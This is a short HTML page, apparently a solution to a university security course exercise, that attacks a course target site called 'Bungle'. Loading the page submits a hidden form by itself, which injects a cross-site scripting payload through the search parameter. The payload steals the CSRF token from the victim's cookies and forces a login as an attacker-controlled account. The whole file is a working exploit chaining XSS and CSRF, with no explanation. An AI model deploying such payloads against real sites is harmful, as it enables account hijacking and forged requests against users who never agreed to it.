<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<iframe name="iframe" id="iframe" style="display:block; visibility:hidden" src="http://bungle-cs461.cs.illinois.edu/"></iframe>
<form id="getCookie" target="iframe" method="GET" action="http://bungle-cs461.cs.illinois.edu/search?">
<input id="qstring" name="q" type="hidden" value="'<script>
var cookie = document.cookie;
var vartoken = cookie.split('csrf_token=');
var url = 'http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0'
$.post(url, { username: 'attacker', password: 'l33th4x', csrf_token: vartoken[1]});
</script>">
</form>
<script>
document.getElementById('getCookie').submit();
</script>